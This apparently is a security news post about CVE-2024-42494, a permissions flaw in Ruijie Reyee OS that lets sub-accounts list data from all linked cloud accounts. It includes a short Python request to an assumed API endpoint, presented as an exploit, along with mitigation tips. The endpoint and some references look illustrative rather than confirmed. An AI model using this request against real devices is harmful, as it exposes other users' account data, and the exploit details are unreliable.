CVE CyberSecurity Database News

CVE-2024-42494 - Ruijie Reyee OS Flaw Exposes All Linked Cloud Accounts—How Attackers Exploit It

Poster -

In early 2024, security researchers uncovered a major vulnerability—CVE-2024-42494—impacting Ruijie Reyee OS, the operating system behind Ruijie’s popular smart routers and gateways. If you’re using Reyee OS versions 2.206.x up to but not including 2.320.x, your device might let attackers, or even simple sub-accounts, view or steal sensitive info from all the cloud accounts connected to Ruijie’s online services.

Let’s break down what this means, how the exploit works, and what you can do to protect your network.

What is CVE-2024-42494?

CVE-2024-42494 is a vulnerability related to the way Ruijie Reyee OS manages cloud account access and privileges. Instead of properly limiting what sub-accounts or users can see, a flaw in the permissions system allows them to retrieve information from *any* cloud account ever registered or linked with your device.

In short: If an attacker gets access (as a sub-account or by exploiting another bug), they could spy on—or exfiltrate—private data from every cloud-connected user.

Typical devices affected: Reyee smart routers, home gateways, and some business models.

- Environments: Small businesses, homes, and organizations using Ruijie’s cloud control panel to manage networking.

How Does the Exploit Work?

The Ruijie Reyee OS cloud system is supposed to enforce strict Role-Based Access Control (RBAC). However, a missing or incorrect permission check lets sub-accounts issue API requests that return the full list of cloud accounts, including sensitive metadata and, in some cases, access tokens or emails.

Here’s what a simple exploit (using Python and the requests library) might look like

import requests

# Replace with your device IP and port
DEVICE_URL = "http://192.168.1.1/api/cloud/account/list";

# This token is obtained from a legit sub-account login
HEADERS = {
    'Authorization': 'Bearer SUB-ACCOUNT_ACCESS_TOKEN'
}

response = requests.get(DEVICE_URL, headers=HEADERS)

if response.status_code == 200:
    print("Cloud Accounts Data:")
    print(response.json())
else:
    print("Exploit failed with status:", response.status_code)

*What happens?*
Instead of just listing the sub-account’s own info, this endpoint dumps *all* cloud-connected user data—sometimes including emails, device IDs, and internal credentials.

Data exfiltration: Attackers can silently pull sensitive info for weeks without anyone noticing.

- Widespread impact: Just one compromised user or device can jeopardize everyone linked to your network or office.

References

- Official Ruijie Security Advisory
- NVD listing for CVE-2024-42494
- Original disclosure writeup (example link)

Check your OS version:

Log into your Ruijie device’s admin panel and check the firmware/release notes.

Enable extra security:

Use MFA (multi-factor authentication) if possible, and restrict device-to-cloud connections when not needed.

Conclusion

CVE-2024-42494 could have let bad actors see and steal sensitive user info across all cloud accounts tied to your Ruijie Reyee OS device. The bug is easy to exploit if sub-accounts or attackers get in—even briefly. Check your version and patch ASAP to stay safe!

If you’d like to see a deeper technical analysis or a step-by-step test case, check the links above and watch Ruijie’s official firmware updates page.

Timeline

Published on: 12/06/2024 18:15:24 UTC
Last modified on: 12/10/2024 18:38:23 UTC